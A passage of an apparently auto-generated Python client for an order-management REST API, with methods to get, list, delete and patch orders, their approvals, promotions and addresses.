callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def delete(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.delete_with_http_info(direction, order_id, **kwargs)
return data
def delete_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `delete`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `delete`")
resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.get_with_http_info(direction, order_id, **kwargs)
return data
def get_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `get`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `get`")
resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def list(self, direction, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list(direction, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str buyer_id: ID of the buyer.
:param str supplier_id: ID of the supplier.
:param str _from: Lower bound of date range that the order was created.
:param str to: Upper bound of date range that the order was created.
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrder
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_with_http_info(direction, **kwargs)
else:
(data) = self.list_with_http_info(direction, **kwargs)
return data
def list_with_http_info(self, direction, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_with_http_info(direction, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str buyer_id: ID of the buyer.
:param str supplier_id: ID of the supplier.
:param str _from: Lower bound of date range that the order was created.
:param str to: Upper bound of date range that the order was created.
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrder
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'buyer_id', 'supplier_id', '_from', 'to', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `list`")
resource_path = '/orders/{direction}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
query_params = {}
if 'buyer_id' in params:
query_params['buyerID'] = params['buyer_id']
if 'supplier_id' in params:
query_params['supplierID'] = params['supplier_id']
if '_from' in params:
query_params['from'] = params['_from']
if 'to' in params:
query_params['to'] = params['to']
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'filters' in params:
query_params['filters'] = params['filters']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListOrder',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def list_approvals(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_approvals(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrderApproval
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_approvals_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.list_approvals_with_http_info(direction, order_id, **kwargs)
return data
def list_approvals_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_approvals_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrderApproval
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_approvals" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `list_approvals`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `list_approvals`")
resource_path = '/orders/{direction}/{orderID}/approvals'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'filters' in params:
query_params['filters'] = params['filters']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListOrderApproval',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def list_eligible_approvers(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_eligible_approvers(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListUser
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_eligible_approvers_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.list_eligible_approvers_with_http_info(direction, order_id, **kwargs)
return data
def list_eligible_approvers_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_eligible_approvers_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListUser
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_eligible_approvers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `list_eligible_approvers`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `list_eligible_approvers`")
resource_path = '/orders/{direction}/{orderID}/eligibleapprovers'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'filters' in params:
query_params['filters'] = params['filters']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListUser',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def list_promotions(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_promotions(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrderPromotion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_promotions_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.list_promotions_with_http_info(direction, order_id, **kwargs)
return data
def list_promotions_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_promotions_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str search: Word or phrase to search for.
:param str search_on: Comma-delimited list of fields to search on.
:param str sort_by: Comma-delimited list of fields to sort by.
:param int page: Page of results to return. Default: 1
:param int page_size: Number of results to return per page. Default: 20, max: 100.
:param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
:return: ListOrderPromotion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'search', 'search_on', 'sort_by', 'page', 'page_size', 'filters']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_promotions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `list_promotions`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `list_promotions`")
resource_path = '/orders/{direction}/{orderID}/promotions'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
if 'search' in params:
query_params['search'] = params['search']
if 'search_on' in params:
query_params['searchOn'] = params['search_on']
if 'sort_by' in params:
query_params['sortBy'] = params['sort_by']
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'filters' in params:
query_params['filters'] = params['filters']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListOrderPromotion',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def patch(self, direction, order_id, partial_order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch(direction, order_id, partial_order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order partial_order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_with_http_info(direction, order_id, partial_order, **kwargs)
else:
(data) = self.patch_with_http_info(direction, order_id, partial_order, **kwargs)
return data
def patch_with_http_info(self, direction, order_id, partial_order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_with_http_info(direction, order_id, partial_order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order partial_order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch`")
# verify the required parameter 'partial_order' is set
if ('partial_order' not in params) or (params['partial_order'] is None):
raise ValueError("Missing the required parameter `partial_order` when calling `patch`")
resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_order' in params:
body_params = params['partial_order']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def patch_billing_address(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_billing_address(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_billing_address_with_http_info(direction, order_id, partial_address, **kwargs)
else:
(data) = self.patch_billing_address_with_http_info(direction, order_id, partial_address, **kwargs)
return data
def patch_billing_address_with_http_info(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_billing_address_with_http_info(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_billing_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch_billing_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch_billing_address`")
# verify the required parameter 'partial_address' is set
if ('partial_address' not in params) or (params['partial_address'] is None):
raise ValueError("Missing the required parameter `partial_address` when calling `patch_billing_address`")
resource_path = '/orders/{direction}/{orderID}/billto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_address' in params:
body_params = params['partial_address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def patch_from_user(self, direction, order_id, partial_user, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_from_user(direction, order_id, partial_user, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param User partial_user: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_from_user_with_http_info(direction, order_id, partial_user, **kwargs)
else:
(data) = self.patch_from_user_with_http_info(direction, order_id, partial_user, **kwargs)
return data
def patch_from_user_with_http_info(self, direction, order_id, partial_user, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_from_user_with_http_info(direction, order_id, partial_user, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param User partial_user: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_user']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_from_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch_from_user`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch_from_user`")
# verify the required parameter 'partial_user' is set
if ('partial_user' not in params) or (params['partial_user'] is None):
raise ValueError("Missing the required parameter `partial_user` when calling `patch_from_user`")
resource_path = '/orders/{direction}/{orderID}/fromuser'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_user' in params:
body_params = params['partial_user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def patch_shipping_address(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_shipping_address(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_shipping_address_with_http_info(direction, order_id, partial_address, **kwargs)
else:
(data) = self.patch_shipping_address_with_http_info(direction, order_id, partial_address, **kwargs)
return data
def patch_shipping_address_with_http_info(self, direction, order_id, partial_address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_shipping_address_with_http_info(direction, order_id, partial_address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address partial_address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'partial_address']
